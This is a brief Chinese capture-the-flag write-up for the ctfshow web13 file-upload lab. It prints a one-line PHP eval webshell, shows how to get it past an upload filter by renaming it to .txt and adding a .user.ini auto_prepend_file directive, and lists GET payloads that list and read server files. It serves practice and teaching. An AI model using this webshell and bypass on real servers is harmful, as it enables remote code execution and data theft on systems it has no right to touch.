CTFshow-Web-文件上传

一、靶场：ctfshow web13
二、解题步骤
步骤一：打开靶场，发现有文件上传的按钮，猜测是文件上传的洞，打开源码也没有其他提示

步骤二：先尝试上传一些文件

1、图片文件，但报错了，似乎太大了

2、再尝试上传一个空的php，显示后缀错误

3、尝试上传一个空文本，上传成功

4、那就尝试写一个最短的一句话木马：<?php eval($_GET[a]); 作为文本尝试上传，成功

步骤三：由前面的尝试可以得知图片马应该是不行了，大小限制了，那么这里尝试上传 .user.ini 和 .htaccess 文件去解析前面上传的木马文本，但由于大小问题 .htaccess 文件无法上传，那么这里尝试 .user.ini 看 ini 文件能否上传

内容：auto_prepend_file=1.txt

成功

步骤四：连接，使用payload：?a=print_r(glob("*")); 查看当前文件夹的文件

步骤五：flag应该在那个文件名很长的文件中，使用payload：?a=highlight_file(""); 查看文件内容，得到flag

注意事项：使用.user.ini的前提是含有.user.ini的文件夹下需要有正常的php文件，否则也不能包含了